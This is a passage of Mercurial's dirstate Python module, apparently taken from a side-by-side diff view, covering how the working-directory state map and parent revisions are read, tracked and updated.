84 # ntpath.join(root, '') of Python 2.7.9 does not add sep if root is
85 # UNC path pointing to root share (issue4557)
85 # UNC path pointing to root share (issue4557)
86 self._rootdir = pathutil.normasprefix(root)
86 self._rootdir = pathutil.normasprefix(root)
87 self._dirty = False
87 self._dirty = False
88 self._dirtypl = False
88 self._dirtypl = False
89 self._lastnormaltime = 0
89 self._lastnormaltime = 0
90 self._ui = ui
90 self._ui = ui
91 self._filecache = {}
91 self._filecache = {}
92 self._parentwriters = 0
92 self._parentwriters = 0
93 self._filename = 'dirstate'
93 self._filename = 'dirstate'
94 self._pendingfilename = '%s.pending' % self._filename
94 self._pendingfilename = '%s.pending' % self._filename
95 self._plchangecallbacks = {}
95 self._plchangecallbacks = {}
96 self._origpl = None
96 self._origpl = None
97 self._updatedfiles = set()
97 self._updatedfiles = set()
98
98
99 # for consistent view between _pl() and _read() invocations
99 # for consistent view between _pl() and _read() invocations
100 self._pendingmode = None
100 self._pendingmode = None
101
101
102 @contextlib.contextmanager
102 @contextlib.contextmanager
103 def parentchange(self):
103 def parentchange(self):
104 '''Context manager for handling dirstate parents.
104 '''Context manager for handling dirstate parents.
105
105
106 If an exception occurs in the scope of the context manager,
106 If an exception occurs in the scope of the context manager,
107 the incoherent dirstate won't be written when wlock is
107 the incoherent dirstate won't be written when wlock is
108 released.
108 released.
109 '''
109 '''
110 self._parentwriters += 1
110 self._parentwriters += 1
111 yield
111 yield
112 # Typically we want the "undo" step of a context manager in a
112 # Typically we want the "undo" step of a context manager in a
113 # finally block so it happens even when an exception
113 # finally block so it happens even when an exception
114 # occurs. In this case, however, we only want to decrement
114 # occurs. In this case, however, we only want to decrement
115 # parentwriters if the code in the with statement exits
115 # parentwriters if the code in the with statement exits
116 # normally, so we don't have a try/finally here on purpose.
116 # normally, so we don't have a try/finally here on purpose.
117 self._parentwriters -= 1
117 self._parentwriters -= 1
118
118
119 def beginparentchange(self):
119 def beginparentchange(self):
120 '''Marks the beginning of a set of changes that involve changing
120 '''Marks the beginning of a set of changes that involve changing
121 the dirstate parents. If there is an exception during this time,
121 the dirstate parents. If there is an exception during this time,
122 the dirstate will not be written when the wlock is released. This
122 the dirstate will not be written when the wlock is released. This
123 prevents writing an incoherent dirstate where the parent doesn't
123 prevents writing an incoherent dirstate where the parent doesn't
124 match the contents.
124 match the contents.
125 '''
125 '''
126 self._ui.deprecwarn('beginparentchange is obsoleted by the '
126 self._ui.deprecwarn('beginparentchange is obsoleted by the '
127 'parentchange context manager.', '4.3')
127 'parentchange context manager.', '4.3')
128 self._parentwriters += 1
128 self._parentwriters += 1
129
129
130 def endparentchange(self):
130 def endparentchange(self):
131 '''Marks the end of a set of changes that involve changing the
131 '''Marks the end of a set of changes that involve changing the
132 dirstate parents. Once all parent changes have been marked done,
132 dirstate parents. Once all parent changes have been marked done,
133 the wlock will be free to write the dirstate on release.
133 the wlock will be free to write the dirstate on release.
134 '''
134 '''
135 self._ui.deprecwarn('endparentchange is obsoleted by the '
135 self._ui.deprecwarn('endparentchange is obsoleted by the '
136 'parentchange context manager.', '4.3')
136 'parentchange context manager.', '4.3')
137 if self._parentwriters > 0:
137 if self._parentwriters > 0:
138 self._parentwriters -= 1
138 self._parentwriters -= 1
139
139
140 def pendingparentchange(self):
140 def pendingparentchange(self):
141 '''Returns true if the dirstate is in the middle of a set of changes
141 '''Returns true if the dirstate is in the middle of a set of changes
142 that modify the dirstate parent.
142 that modify the dirstate parent.
143 '''
143 '''
144 return self._parentwriters > 0
144 return self._parentwriters > 0
145
145
146 @propertycache
146 @propertycache
147 def _map(self):
147 def _map(self):
148 '''Return the dirstate contents as a map from filename to
148 '''Return the dirstate contents as a map from filename to
149 (state, mode, size, time).'''
149 (state, mode, size, time).'''
150 self._read()
150 self._read()
151 return self._map
151 return self._map
152
152
153 @propertycache
153 @propertycache
154 def _copymap(self):
154 def _copymap(self):
155 self._read()
155 self._read()
156 return self._copymap
156 return self._copymap
157
157
158 @propertycache
158 @propertycache
159 def _identity(self):
159 def _identity(self):
160 self._read()
160 self._read()
161 return self._identity
161 return self._identity
162
162
163 @propertycache
163 @propertycache
164 def _nonnormalset(self):
164 def _nonnormalset(self):
165 nonnorm, otherparents = nonnormalentries(self._map)
165 nonnorm, otherparents = nonnormalentries(self._map)
166 self._otherparentset = otherparents
166 self._otherparentset = otherparents
167 return nonnorm
167 return nonnorm
168
168
169 @propertycache
169 @propertycache
170 def _otherparentset(self):
170 def _otherparentset(self):
171 nonnorm, otherparents = nonnormalentries(self._map)
171 nonnorm, otherparents = nonnormalentries(self._map)
172 self._nonnormalset = nonnorm
172 self._nonnormalset = nonnorm
173 return otherparents
173 return otherparents
174
174
175 @propertycache
175 @propertycache
176 def _filefoldmap(self):
176 def _filefoldmap(self):
177 try:
177 try:
178 makefilefoldmap = parsers.make_file_foldmap
178 makefilefoldmap = parsers.make_file_foldmap
179 except AttributeError:
179 except AttributeError:
180 pass
180 pass
181 else:
181 else:
182 return makefilefoldmap(self._map, util.normcasespec,
182 return makefilefoldmap(self._map, util.normcasespec,
183 util.normcasefallback)
183 util.normcasefallback)
184
184
185 f = {}
185 f = {}
186 normcase = util.normcase
186 normcase = util.normcase
187 for name, s in self._map.iteritems():
187 for name, s in self._map.iteritems():
188 if s[0] != 'r':
188 if s[0] != 'r':
189 f[normcase(name)] = name
189 f[normcase(name)] = name
190 f['.'] = '.' # prevents useless util.fspath() invocation
190 f['.'] = '.' # prevents useless util.fspath() invocation
191 return f
191 return f
192
192
193 @propertycache
193 @propertycache
194 def _dirfoldmap(self):
194 def _dirfoldmap(self):
195 f = {}
195 f = {}
196 normcase = util.normcase
196 normcase = util.normcase
197 for name in self._dirs:
197 for name in self._dirs:
198 f[normcase(name)] = name
198 f[normcase(name)] = name
199 return f
199 return f
200
200
201 @property
201 @property
202 def _sparsematcher(self):
202 def _sparsematcher(self):
203 """The matcher for the sparse checkout.
203 """The matcher for the sparse checkout.
204
204
205 The working directory may not include every file from a manifest. The
205 The working directory may not include every file from a manifest. The
206 matcher obtained by this property will match a path if it is to be
206 matcher obtained by this property will match a path if it is to be
207 included in the working directory.
207 included in the working directory.
208 """
208 """
209 # TODO there is potential to cache this property. For now, the matcher
209 # TODO there is potential to cache this property. For now, the matcher
210 # is resolved on every access. (But the called function does use a
210 # is resolved on every access. (But the called function does use a
211 # cache to keep the lookup fast.)
211 # cache to keep the lookup fast.)
212 return self._sparsematchfn()
212 return self._sparsematchfn()
213
213
214 @repocache('branch')
214 @repocache('branch')
215 def _branch(self):
215 def _branch(self):
216 try:
216 try:
217 return self._opener.read("branch").strip() or "default"
217 return self._opener.read("branch").strip() or "default"
218 except IOError as inst:
218 except IOError as inst:
219 if inst.errno != errno.ENOENT:
219 if inst.errno != errno.ENOENT:
220 raise
220 raise
221 return "default"
221 return "default"
222
222
223 @propertycache
223 @propertycache
224 def _pl(self):
224 def _pl(self):
225 try:
225 try:
226 fp = self._opendirstatefile()
226 fp = self._opendirstatefile()
227 st = fp.read(40)
227 st = fp.read(40)
228 fp.close()
228 fp.close()
229 l = len(st)
229 l = len(st)
230 if l == 40:
230 if l == 40:
231 return st[:20], st[20:40]
231 return st[:20], st[20:40]
232 elif l > 0 and l < 40:
232 elif l > 0 and l < 40:
233 raise error.Abort(_('working directory state appears damaged!'))
233 raise error.Abort(_('working directory state appears damaged!'))
234 except IOError as err:
234 except IOError as err:
235 if err.errno != errno.ENOENT:
235 if err.errno != errno.ENOENT:
236 raise
236 raise
237 return [nullid, nullid]
237 return [nullid, nullid]
238
238
239 @propertycache
239 @propertycache
240 def _dirs(self):
240 def _dirs(self):
241 return util.dirs(self._map, 'r')
241 return util.dirs(self._map, 'r')
242
242
243 def dirs(self):
243 def dirs(self):
244 return self._dirs
244 return self._dirs
245
245
246 @rootcache('.hgignore')
246 @rootcache('.hgignore')
247 def _ignore(self):
247 def _ignore(self):
248 files = self._ignorefiles()
248 files = self._ignorefiles()
249 if not files:
249 if not files:
250 return matchmod.never(self._root, '')
250 return matchmod.never(self._root, '')
251
251
252 pats = ['include:%s' % f for f in files]
252 pats = ['include:%s' % f for f in files]
253 return matchmod.match(self._root, '', [], pats, warn=self._ui.warn)
253 return matchmod.match(self._root, '', [], pats, warn=self._ui.warn)
254
254
255 @propertycache
255 @propertycache
256 def _slash(self):
256 def _slash(self):
257 return self._ui.configbool('ui', 'slash') and pycompat.ossep != '/'
257 return self._ui.configbool('ui', 'slash') and pycompat.ossep != '/'
258
258
259 @propertycache
259 @propertycache
260 def _checklink(self):
260 def _checklink(self):
261 return util.checklink(self._root)
261 return util.checklink(self._root)
262
262
263 @propertycache
263 @propertycache
264 def _checkexec(self):
264 def _checkexec(self):
265 return util.checkexec(self._root)
265 return util.checkexec(self._root)
266
266
267 @propertycache
267 @propertycache
268 def _checkcase(self):
268 def _checkcase(self):
269 return not util.fscasesensitive(self._join('.hg'))
269 return not util.fscasesensitive(self._join('.hg'))
270
270
271 def _join(self, f):
271 def _join(self, f):
272 # much faster than os.path.join()
272 # much faster than os.path.join()
273 # it's safe because f is always a relative path
273 # it's safe because f is always a relative path
274 return self._rootdir + f
274 return self._rootdir + f
275
275
276 def flagfunc(self, buildfallback):
276 def flagfunc(self, buildfallback):
277 if self._checklink and self._checkexec:
277 if self._checklink and self._checkexec:
278 def f(x):
278 def f(x):
279 try:
279 try:
280 st = os.lstat(self._join(x))
280 st = os.lstat(self._join(x))
281 if util.statislink(st):
281 if util.statislink(st):
282 return 'l'
282 return 'l'
283 if util.statisexec(st):
283 if util.statisexec(st):
284 return 'x'
284 return 'x'
285 except OSError:
285 except OSError:
286 pass
286 pass
287 return ''
287 return ''
288 return f
288 return f
289
289
290 fallback = buildfallback()
290 fallback = buildfallback()
291 if self._checklink:
291 if self._checklink:
292 def f(x):
292 def f(x):
293 if os.path.islink(self._join(x)):
293 if os.path.islink(self._join(x)):
294 return 'l'
294 return 'l'
295 if 'x' in fallback(x):
295 if 'x' in fallback(x):
296 return 'x'
296 return 'x'
297 return ''
297 return ''
298 return f
298 return f
299 if self._checkexec:
299 if self._checkexec:
300 def f(x):
300 def f(x):
301 if 'l' in fallback(x):
301 if 'l' in fallback(x):
302 return 'l'
302 return 'l'
303 if util.isexec(self._join(x)):
303 if util.isexec(self._join(x)):
304 return 'x'
304 return 'x'
305 return ''
305 return ''
306 return f
306 return f
307 else:
307 else:
308 return fallback
308 return fallback
309
309
310 @propertycache
310 @propertycache
311 def _cwd(self):
311 def _cwd(self):
312 # internal config: ui.forcecwd
312 # internal config: ui.forcecwd
313 forcecwd = self._ui.config('ui', 'forcecwd')
313 forcecwd = self._ui.config('ui', 'forcecwd')
314 if forcecwd:
314 if forcecwd:
315 return forcecwd
315 return forcecwd
316 return pycompat.getcwd()
316 return pycompat.getcwd()
317
317
318 def getcwd(self):
318 def getcwd(self):
319 '''Return the path from which a canonical path is calculated.
319 '''Return the path from which a canonical path is calculated.
320
320
321 This path should be used to resolve file patterns or to convert
321 This path should be used to resolve file patterns or to convert
322 canonical paths back to file paths for display. It shouldn't be
322 canonical paths back to file paths for display. It shouldn't be
323 used to get real file paths. Use vfs functions instead.
323 used to get real file paths. Use vfs functions instead.
324 '''
324 '''
325 cwd = self._cwd
325 cwd = self._cwd
326 if cwd == self._root:
326 if cwd == self._root:
327 return ''
327 return ''
328 # self._root ends with a path separator if self._root is '/' or 'C:\'
328 # self._root ends with a path separator if self._root is '/' or 'C:\'
329 rootsep = self._root
329 rootsep = self._root
330 if not util.endswithsep(rootsep):
330 if not util.endswithsep(rootsep):
331 rootsep += pycompat.ossep
331 rootsep += pycompat.ossep
332 if cwd.startswith(rootsep):
332 if cwd.startswith(rootsep):
333 return cwd[len(rootsep):]
333 return cwd[len(rootsep):]
334 else:
334 else:
335 # we're outside the repo. return an absolute path.
335 # we're outside the repo. return an absolute path.
336 return cwd
336 return cwd
337
337
338 def pathto(self, f, cwd=None):
338 def pathto(self, f, cwd=None):
339 if cwd is None:
339 if cwd is None:
340 cwd = self.getcwd()
340 cwd = self.getcwd()
341 path = util.pathto(self._root, cwd, f)
341 path = util.pathto(self._root, cwd, f)
342 if self._slash:
342 if self._slash:
343 return util.pconvert(path)
343 return util.pconvert(path)
344 return path
344 return path
345
345
346 def __getitem__(self, key):
346 def __getitem__(self, key):
347 '''Return the current state of key (a filename) in the dirstate.
347 '''Return the current state of key (a filename) in the dirstate.
348
348
349 States are:
349 States are:
350 n normal
350 n normal
351 m needs merging
351 m needs merging
352 r marked for removal
352 r marked for removal
353 a marked for addition
353 a marked for addition
354 ? not tracked
354 ? not tracked
355 '''
355 '''
356 return self._map.get(key, ("?",))[0]
356 return self._map.get(key, ("?",))[0]
357
357
358 def __contains__(self, key):
358 def __contains__(self, key):
359 return key in self._map
359 return key in self._map
360
360
361 def __iter__(self):
361 def __iter__(self):
362 return iter(sorted(self._map))
362 return iter(sorted(self._map))
363
363
364 def items(self):
364 def items(self):
365 return self._map.iteritems()
365 return self._map.iteritems()
366
366
367 iteritems = items
367 iteritems = items
368
368
369 def parents(self):
369 def parents(self):
370 return [self._validate(p) for p in self._pl]
370 return [self._validate(p) for p in self._pl]
371
371
372 def p1(self):
372 def p1(self):
373 return self._validate(self._pl[0])
373 return self._validate(self._pl[0])
374
374
375 def p2(self):
375 def p2(self):
376 return self._validate(self._pl[1])
376 return self._validate(self._pl[1])
377
377
378 def branch(self):
378 def branch(self):
379 return encoding.tolocal(self._branch)
379 return encoding.tolocal(self._branch)
380
380
381 def setparents(self, p1, p2=nullid):
381 def setparents(self, p1, p2=nullid):
382 """Set dirstate parents to p1 and p2.
382 """Set dirstate parents to p1 and p2.
383
383
384 When moving from two parents to one, 'm' merged entries a
384 When moving from two parents to one, 'm' merged entries a
385 adjusted to normal and previous copy records discarded and
385 adjusted to normal and previous copy records discarded and
386 returned by the call.
386 returned by the call.
387
387
388 See localrepo.setparents()
388 See localrepo.setparents()
389 """
389 """
390 if self._parentwriters == 0:
390 if self._parentwriters == 0:
391 raise ValueError("cannot set dirstate parent without "
391 raise ValueError("cannot set dirstate parent without "
392 "calling dirstate.beginparentchange")
392 "calling dirstate.beginparentchange")
393
393
394 self._dirty = self._dirtypl = True
394 self._dirty = self._dirtypl = True
395 oldp2 = self._pl[1]
395 oldp2 = self._pl[1]
396 if self._origpl is None:
396 if self._origpl is None:
397 self._origpl = self._pl
397 self._origpl = self._pl
398 self._pl = p1, p2
398 self._pl = p1, p2
399 copies = {}
399 copies = {}
400 if oldp2 != nullid and p2 == nullid:
400 if oldp2 != nullid and p2 == nullid:
401 candidatefiles = self._nonnormalset.union(self._otherparentset)
401 candidatefiles = self._nonnormalset.union(self._otherparentset)
402 for f in candidatefiles:
402 for f in candidatefiles:
403 s = self._map.get(f)
403 s = self._map.get(f)
404 if s is None:
404 if s is None:
405 continue
405 continue
406
406
407 # Discard 'm' markers when moving away from a merge state
407 # Discard 'm' markers when moving away from a merge state
408 if s[0] == 'm':
408 if s[0] == 'm':
409 if f in self._copymap:
409 if f in self._copymap:
410 copies[f] = self._copymap[f]
410 copies[f] = self._copymap[f]
411 self.normallookup(f)
411 self.normallookup(f)
412 # Also fix up otherparent markers
412 # Also fix up otherparent markers
413 elif s[0] == 'n' and s[2] == -2:
413 elif s[0] == 'n' and s[2] == -2:
414 if f in self._copymap:
414 if f in self._copymap:
415 copies[f] = self._copymap[f]
415 copies[f] = self._copymap[f]
416 self.add(f)
416 self.add(f)
417 return copies
417 return copies
418
418
419 def setbranch(self, branch):
419 def setbranch(self, branch):
420 self._branch = encoding.fromlocal(branch)
420 self._branch = encoding.fromlocal(branch)
421 f = self._opener('branch', 'w', atomictemp=True, checkambig=True)
421 f = self._opener('branch', 'w', atomictemp=True, checkambig=True)
422 try:
422 try:
423 f.write(self._branch + '\n')
423 f.write(self._branch + '\n')
424 f.close()
424 f.close()
425
425
426 # make sure filecache has the correct stat info for _branch after
426 # make sure filecache has the correct stat info for _branch after
427 # replacing the underlying file
427 # replacing the underlying file
428 ce = self._filecache['_branch']
428 ce = self._filecache['_branch']
429 if ce:
429 if ce:
430 ce.refresh()
430 ce.refresh()
431 except: # re-raises
431 except: # re-raises
432 f.discard()
432 f.discard()
433 raise
433 raise
434
434
435 def _opendirstatefile(self):
435 def _opendirstatefile(self):
436 fp, mode = txnutil.trypending(self._root, self._opener, self._filename)
436 fp, mode = txnutil.trypending(self._root, self._opener, self._filename)
437 if self._pendingmode is not None and self._pendingmode != mode:
437 if self._pendingmode is not None and self._pendingmode != mode:
438 fp.close()
438 fp.close()
439 raise error.Abort(_('working directory state may be '
439 raise error.Abort(_('working directory state may be '
440 'changed parallelly'))
440 'changed parallelly'))
441 self._pendingmode = mode
441 self._pendingmode = mode
442 return fp
442 return fp
443
443
444 def _read(self):
444 def _read(self):
445 self._map = {}
445 self._map = {}
446 self._copymap = {}
446 self._copymap = {}
447 # ignore HG_PENDING because identity is used only for writing
447 # ignore HG_PENDING because identity is used only for writing
448 self._identity = util.filestat.frompath(
448 self._identity = util.filestat.frompath(
449 self._opener.join(self._filename))
449 self._opener.join(self._filename))
450 try:
450 try:
451 fp = self._opendirstatefile()
451 fp = self._opendirstatefile()
452 try:
452 try:
453 st = fp.read()
453 st = fp.read()
454 finally:
454 finally:
455 fp.close()
455 fp.close()
456 except IOError as err:
456 except IOError as err:
457 if err.errno != errno.ENOENT:
457 if err.errno != errno.ENOENT:
458 raise
458 raise
459 return
459 return
460 if not st:
460 if not st:
461 return
461 return
462
462
463 if util.safehasattr(parsers, 'dict_new_presized'):
463 if util.safehasattr(parsers, 'dict_new_presized'):
464 # Make an estimate of the number of files in the dirstate based on
464 # Make an estimate of the number of files in the dirstate based on
465 # its size. From a linear regression on a set of real-world repos,
465 # its size. From a linear regression on a set of real-world repos,
466 # all over 10,000 files, the size of a dirstate entry is 85
466 # all over 10,000 files, the size of a dirstate entry is 85
467 # bytes. The cost of resizing is significantly higher than the cost
467 # bytes. The cost of resizing is significantly higher than the cost
468 # of filling in a larger presized dict, so subtract 20% from the
468 # of filling in a larger presized dict, so subtract 20% from the
469 # size.
469 # size.
470 #
470 #
471 # This heuristic is imperfect in many ways, so in a future dirstate
471 # This heuristic is imperfect in many ways, so in a future dirstate
472 # format update it makes sense to just record the number of entries
472 # format update it makes sense to just record the number of entries
473 # on write.
473 # on write.
474 self._map = parsers.dict_new_presized(len(st) / 71)
474 self._map = parsers.dict_new_presized(len(st) / 71)
475
475
476 # Python's garbage collector triggers a GC each time a certain number
476 # Python's garbage collector triggers a GC each time a certain number
477 # of container objects (the number being defined by
477 # of container objects (the number being defined by
478 # gc.get_threshold()) are allocated. parse_dirstate creates a tuple
478 # gc.get_threshold()) are allocated. parse_dirstate creates a tuple
479 # for each file in the dirstate. The C version then immediately marks
479 # for each file in the dirstate. The C version then immediately marks
480 # them as not to be tracked by the collector. However, this has no
480 # them as not to be tracked by the collector. However, this has no
481 # effect on when GCs are triggered, only on what objects the GC looks
481 # effect on when GCs are triggered, only on what objects the GC looks
482 # into. This means that O(number of files) GCs are unavoidable.
482 # into. This means that O(number of files) GCs are unavoidable.
483 # Depending on when in the process's lifetime the dirstate is parsed,
483 # Depending on when in the process's lifetime the dirstate is parsed,
484 # this can get very expensive. As a workaround, disable GC while
484 # this can get very expensive. As a workaround, disable GC while
485 # parsing the dirstate.
485 # parsing the dirstate.
486 #
486 #
487 # (we cannot decorate the function directly since it is in a C module)
487 # (we cannot decorate the function directly since it is in a C module)
488 parse_dirstate = util.nogc(parsers.parse_dirstate)
488 parse_dirstate = util.nogc(parsers.parse_dirstate)
489 p = parse_dirstate(self._map, self._copymap, st)
489 p = parse_dirstate(self._map, self._copymap, st)
490 if not self._dirtypl:
490 if not self._dirtypl:
491 self._pl = p
491 self._pl = p
492
492
493 def invalidate(self):
493 def invalidate(self):
494 '''Causes the next access to reread the dirstate.
494 '''Causes the next access to reread the dirstate.
495
495
496 This is different from localrepo.invalidatedirstate() because it always
496 This is different from localrepo.invalidatedirstate() because it always
497 rereads the dirstate. Use localrepo.invalidatedirstate() if you want to
497 rereads the dirstate. Use localrepo.invalidatedirstate() if you want to
498 check whether the dirstate has changed before rereading it.'''
498 check whether the dirstate has changed before rereading it.'''
499
499
500 for a in ("_map", "_copymap", "_identity",
500 for a in ("_map", "_copymap", "_identity",
501 "_filefoldmap", "_dirfoldmap", "_branch",
501 "_filefoldmap", "_dirfoldmap", "_branch",
502 "_pl", "_dirs", "_ignore", "_nonnormalset",
502 "_pl", "_dirs", "_ignore", "_nonnormalset",
503 "_otherparentset"):
503 "_otherparentset"):
504 if a in self.__dict__:
504 if a in self.__dict__:
505 delattr(self, a)
505 delattr(self, a)
506 self._lastnormaltime = 0
506 self._lastnormaltime = 0
507 self._dirty = False
507 self._dirty = False
508 self._updatedfiles.clear()
508 self._updatedfiles.clear()
509 self._parentwriters = 0
509 self._parentwriters = 0
510 self._origpl = None
510 self._origpl = None
511
511
512 def copy(self, source, dest):
512 def copy(self, source, dest):
513 """Mark dest as a copy of source. Unmark dest if source is None."""
513 """Mark dest as a copy of source. Unmark dest if source is None."""
514 if source == dest:
514 if source == dest:
515 return
515 return
516 self._dirty = True
516 self._dirty = True
517 if source is not None:
517 if source is not None:
518 self._copymap[dest] = source
518 self._copymap[dest] = source
519 self._updatedfiles.add(source)
519 self._updatedfiles.add(source)
520 self._updatedfiles.add(dest)
520 self._updatedfiles.add(dest)
521 elif dest in self._copymap:
521 elif dest in self._copymap:
522 del self._copymap[dest]
522 del self._copymap[dest]
523 self._updatedfiles.add(dest)
523 self._updatedfiles.add(dest)
524
524
525 def copied(self, file):
525 def copied(self, file):
526 return self._copymap.get(file, None)
526 return self._copymap.get(file, None)
527
527
528 def copies(self):
528 def copies(self):
529 return self._copymap
529 return self._copymap
530
530
531 def _droppath(self, f):
531 def _droppath(self, f):
532 if self[f] not in "?r" and "_dirs" in self.__dict__:
532 if self[f] not in "?r" and "_dirs" in self.__dict__:
533 self._dirs.delpath(f)
533 self._dirs.delpath(f)
534
534
535 if "_filefoldmap" in self.__dict__:
535 if "_filefoldmap" in self.__dict__:
536 normed = util.normcase(f)
536 normed = util.normcase(f)
537 if normed in self._filefoldmap:
537 if normed in self._filefoldmap:
538 del self._filefoldmap[normed]
538 del self._filefoldmap[normed]
539
539
540 self._updatedfiles.add(f)
540 self._updatedfiles.add(f)
541
541
542 def _addpath(self, f, state, mode, size, mtime):
542 def _addpath(self, f, state, mode, size, mtime):
543 oldstate = self[f]
543 oldstate = self[f]
544 if state == 'a' or oldstate == 'r':
544 if state == 'a' or oldstate == 'r':
545 scmutil.checkfilename(f)
545 scmutil.checkfilename(f)
546 if f in self._dirs:
546 if f in self._dirs:
547 raise error.Abort(_('directory %r already in dirstate') % f)
547 raise error.Abort(_('directory %r already in dirstate') % f)
548 # shadows
548 # shadows
549 for d in util.finddirs(f):
549 for d in util.finddirs(f):
550 if d in self._dirs:
550 if d in self._dirs:
551 break
551 break
552 if d in self._map and self[d] != 'r':
552 if d in self._map and self[d] != 'r':
553 raise error.Abort(
553 raise error.Abort(
554 _('file %r in dirstate clashes with %r') % (d, f))
554 _('file %r in dirstate clashes with %r') % (d, f))
555 if oldstate in "?r" and "_dirs" in self.__dict__:
555 if oldstate in "?r" and "_dirs" in self.__dict__:
556 self._dirs.addpath(f)
556 self._dirs.addpath(f)
557 self._dirty = True
557 self._dirty = True
558 self._updatedfiles.add(f)
558 self._updatedfiles.add(f)
559 self._map[f] = dirstatetuple(state, mode, size, mtime)
559 self._map[f] = dirstatetuple(state, mode, size, mtime)
560 if state != 'n' or mtime == -1:
560 if state != 'n' or mtime == -1:
561 self._nonnormalset.add(f)
561 self._nonnormalset.add(f)
562 if size == -2:
562 if size == -2:
563 self._otherparentset.add(f)
563 self._otherparentset.add(f)
564
564
565 def normal(self, f):
565 def normal(self, f):
566 '''Mark a file normal and clean.'''
566 '''Mark a file normal and clean.'''
567 s = os.lstat(self._join(f))
567 s = os.lstat(self._join(f))
568 mtime = s.st_mtime
568 mtime = s.st_mtime
569 self._addpath(f, 'n', s.st_mode,
569 self._addpath(f, 'n', s.st_mode,
570 s.st_size & _rangemask, mtime & _rangemask)
570 s.st_size & _rangemask, mtime & _rangemask)
571 if f in self._copymap:
571 if f in self._copymap:
572 del self._copymap[f]
572 del self._copymap[f]
573 if f in self._nonnormalset:
573 if f in self._nonnormalset:
574 self._nonnormalset.remove(f)
574 self._nonnormalset.remove(f)
575 if mtime > self._lastnormaltime:
575 if mtime > self._lastnormaltime:
576 # Remember the most recent modification timeslot for status(),
576 # Remember the most recent modification timeslot for status(),
577 # to make sure we won't miss future size-preserving file content
577 # to make sure we won't miss future size-preserving file content
578 # modifications that happen within the same timeslot.
578 # modifications that happen within the same timeslot.
579 self._lastnormaltime = mtime
579 self._lastnormaltime = mtime
580
580
581 def normallookup(self, f):
581 def normallookup(self, f):
582 '''Mark a file normal, but possibly dirty.'''
582 '''Mark a file normal, but possibly dirty.'''
583 if self._pl[1] != nullid and f in self._map:
583 if self._pl[1] != nullid and f in self._map:
584 # if there is a merge going on and the file was either
584 # if there is a merge going on and the file was either
585 # in state 'm' (-1) or coming from other parent (-2) before
585 # in state 'm' (-1) or coming from other parent (-2) before
586 # being removed, restore that state.
586 # being removed, restore that state.
587 entry = self._map[f]
587 entry = self._map[f]
588 if entry[0] == 'r' and entry[2] in (-1, -2):
588 if entry[0] == 'r' and entry[2] in (-1, -2):
589 source = self._copymap.get(f)
589 source = self._copymap.get(f)
590 if entry[2] == -1:
590 if entry[2] == -1:
591 self.merge(f)
591 self.merge(f)
592 elif entry[2] == -2:
592 elif entry[2] == -2:
593 self.otherparent(f)
593 self.otherparent(f)
594 if source:
594 if source:
595 self.copy(source, f)
595 self.copy(source, f)
596 return
596 return
597 if entry[0] == 'm' or entry[0] == 'n' and entry[2] == -2:
597 if entry[0] == 'm' or entry[0] == 'n' and entry[2] == -2:
598 return
598 return
599 self._addpath(f, 'n', 0, -1, -1)
599 self._addpath(f, 'n', 0, -1, -1)
600 if f in self._copymap:
600 if f in self._copymap:
601 del self._copymap[f]
601 del self._copymap[f]
602 if f in self._nonnormalset:
602 if f in self._nonnormalset:
603 self._nonnormalset.remove(f)
603 self._nonnormalset.remove(f)
604
604
605 def otherparent(self, f):
605 def otherparent(self, f):
606 '''Mark as coming from the other parent, always dirty.'''
606 '''Mark as coming from the other parent, always dirty.'''
607 if self._pl[1] == nullid:
607 if self._pl[1] == nullid:
608 raise error.Abort(_("setting %r to other parent "
608 raise error.Abort(_("setting %r to other parent "
609 "only allowed in merges") % f)
609 "only allowed in merges") % f)
610 if f in self and self[f] == 'n':
610 if f in self and self[f] == 'n':
611 # merge-like
611 # merge-like
612 self._addpath(f, 'm', 0, -2, -1)
612 self._addpath(f, 'm', 0, -2, -1)
613 else:
613 else:
614 # add-like
614 # add-like
615 self._addpath(f, 'n', 0, -2, -1)
615 self._addpath(f, 'n', 0, -2, -1)
616
616
617 if f in self._copymap:
617 if f in self._copymap:
618 del self._copymap[f]
618 del self._copymap[f]
619
619
620 def add(self, f):
620 def add(self, f):
621 '''Mark a file added.'''
621 '''Mark a file added.'''
622 self._addpath(f, 'a', 0, -1, -1)
622 self._addpath(f, 'a', 0, -1, -1)
623 if f in self._copymap:
623 if f in self._copymap:
624 del self._copymap[f]
624 del self._copymap[f]
625
625
626 def remove(self, f):
626 def remove(self, f):
627 '''Mark a file removed.'''
627 '''Mark a file removed.'''
628 self._dirty = True
628 self._dirty = True
629 self._droppath(f)
629 self._droppath(f)
630 size = 0
630 size = 0
631 if self._pl[1] != nullid and f in self._map:
631 if self._pl[1] != nullid and f in self._map:
632 # backup the previous state
632 # backup the previous state
633 entry = self._map[f]
633 entry = self._map[f]
634 if entry[0] == 'm': # merge
634 if entry[0] == 'm': # merge
635 size = -1
635 size = -1
636 elif entry[0] == 'n' and entry[2] == -2: # other parent
636 elif entry[0] == 'n' and entry[2] == -2: # other parent
637 size = -2
637 size = -2
638 self._otherparentset.add(f)
638 self._otherparentset.add(f)
639 self._map[f] = dirstatetuple('r', 0, size, 0)
639 self._map[f] = dirstatetuple('r', 0, size, 0)
640 self._nonnormalset.add(f)
640 self._nonnormalset.add(f)
641 if size == 0 and f in self._copymap:
641 if size == 0 and f in self._copymap:
642 del self._copymap[f]
642 del self._copymap[f]
643
643
644 def merge(self, f):
644 def merge(self, f):
645 '''Mark a file merged.'''
645 '''Mark a file merged.'''
646 if self._pl[1] == nullid:
646 if self._pl[1] == nullid:
647 return self.normallookup(f)
647 return self.normallookup(f)
648 return self.otherparent(f)
648 return self.otherparent(f)
649
649
650 def drop(self, f):
650 def drop(self, f):
651 '''Drop a file from the dirstate'''
651 '''Drop a file from the dirstate'''
652 if f in self._map:
652 if f in self._map:
653 self._dirty = True
653 self._dirty = True
654 self._droppath(f)
654 self._droppath(f)
655 del self._map[f]
655 del self._map[f]
656 if f in self._nonnormalset:
656 if f in self._nonnormalset:
657 self._nonnormalset.remove(f)
657 self._nonnormalset.remove(f)
658 if f in self._copymap:
658 if f in self._copymap:
659 del self._copymap[f]
659 del self._copymap[f]
660
660
661 def _discoverpath(self, path, normed, ignoremissing, exists, storemap):
661 def _discoverpath(self, path, normed, ignoremissing, exists, storemap):
662 if exists is None:
662 if exists is None:
663 exists = os.path.lexists(os.path.join(self._root, path))
663 exists = os.path.lexists(os.path.join(self._root, path))
664 if not exists:
664 if not exists:
665 # Maybe a path component exists
665 # Maybe a path component exists
666 if not ignoremissing and '/' in path:
666 if not ignoremissing and '/' in path:
667 d, f = path.rsplit('/', 1)
667 d, f = path.rsplit('/', 1)
668 d = self._normalize(d, False, ignoremissing, None)
668 d = self._normalize(d, False, ignoremissing, None)
